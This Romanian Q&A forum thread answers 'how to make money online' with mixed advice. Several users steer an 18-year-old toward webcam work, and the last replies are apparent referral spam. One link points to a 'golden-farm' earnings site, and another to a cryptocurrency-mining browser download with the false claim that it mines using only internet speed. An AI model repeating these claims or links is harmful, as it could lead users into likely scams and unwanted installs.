| anonim_4396 a întrebat:

Cum să faci bani online?

15 răspunsuri:
| GabiDumitrescu a răspuns:

Ce stii sa faci?

| Gabriela1Gbby a răspuns (pentru GabiDumitrescu):

Sunt dispusa să fac aproape orice...
Am 18 ani, sunt în clasa a XII-a

suntserios
| suntserios a răspuns (pentru Gabriela1Gbby):

Cum stai cu programarea? web designul? seo?

| SadBoyForever a răspuns:

Și pe mine tot acest lucru m-ar interesa.

Chiar aș vrea să știu cum se pot scoate bani online.

| mastadont a răspuns:

Sunt multe oportunități online, depinde de ce abilități ai. Poți încerca data entry, transcrieri, traduceri, SEO, marketing, Programare, etc. Există și așa-numitele microjobs dar din alea nu prea faci mulți bani. Eu lucrez momentan ca transcripționist pe limba engleză și e destul de greu să faci bani încât să te poți descurca pentru că competiția e mare.

| GabiDumitrescu a răspuns (pentru Gabriela1Gbby):

Stai sa divortez intii si rezolvam. Lasind gluma deoparte, chiar daca acest "aproape orice" include video chat - nu am nici o problema legat de activitatea asta, nu judec cum fac altii pe aici - e musai sa te descurci FOARTE BINE cu cel putin limba engleza. La o adica, video chatul nu e musai sa fie pe dezbracatelea, poti face vc fara sa dai jos nici o textila sau sa iti bagi chestii in orificii, important e sa poti sa duci o discutie pe diverse teme si sa ii mentii interesul pentru alte intilniri virtuale. Asta cu "sunt dispusa" nu ma ajuta in mod deosebit, decat zi-mi cum te descurci cu engleza, cultura generala, utilizarea calculatorului in general, pasiuni, aptitudini. Dupa aia o sa pot sa iti dau niste sfaturi mai pertinente.

| Illuminati2016 a răspuns (pentru GabiDumitrescu):

Hooker spotted

| GabiDumitrescu a răspuns (pentru Illuminati2016):

Sau nu. Uite ce hooker avem prim-ministru. Alea sunt cele mai nocive. Astea care fac what hookers do fara sa se apuce sa urce pe cadavre ca sa se dea mari doamne mai tirziu au tot respectul, stima, si compasiunea mea.

| RainbowD a răspuns:

Poti face bani pe DevianArt daca ai talent la desen/foto etc. happy

| Atotstiutorul a răspuns (pentru Gabriela1Gbby):

Defineste acel "aproape" eu recomand fara nici un fel de misto videochat.

| Bizon95 a răspuns:

Ca fata, daca ai 18 ani si nu locuiesti intr-un rahat amarat de GAURA, atunci poti sa faci videochat

(chiar aici a fost, ca a venit prietena uneia la magazinul in care lucra si i-a facut mizerie totala ca de ce a lucrat pe videochat, asa ca directoarea magazinului a dat-o afara... angry )

oricum, sa stii ca pe videochat NU aspectul e cel mai important lucru, ci atitudinea si manipularea, am vazut femeie de 45 de ani care facea bani binemercic, si alta care nu se dezbraca niciodata, ci doar ii umilea pe barbati (se numeste dominare si SUNT barbati care cauta asa ceva, chiar nu sunt putini... DELOC)

| csm177 a răspuns:

Https://golden-farm.biz/? r=1538791 intra aici ..eu am facut 2 dolari in doua zile, dar poti sa cresti repede, am si dovada daca vrei

| csm177 a răspuns (pentru Gabriela1Gbby):

Incearca Https://golden-farm.biz/? r=1538791 intra aici ..eu am facut 2 dolari in doua zile, dar poti sa cresti repede, am si dovada daca vrei

| bNkNz1 a răspuns:

Mineaza bitcoin acum cel mai usor posibil!
Tot ce trebuie sa faci este sa descarci acest browser: https://get.cryptobrowser.site/12738006
Dupa ce il instalezi si iti faci un cont, acesta v-a incepe sa mineze pentru tine datorita vitezei internetului.
NU FOLOSESTE PUTEREA CALCULATORULUI, DOAR VITEZA DE INTERNET.
Acest browser a fost creat pe bazele chromului. Simplu si usor nu trebuie sa faci nimic decat "sa pierzi vremea pe net", accesand acest browser.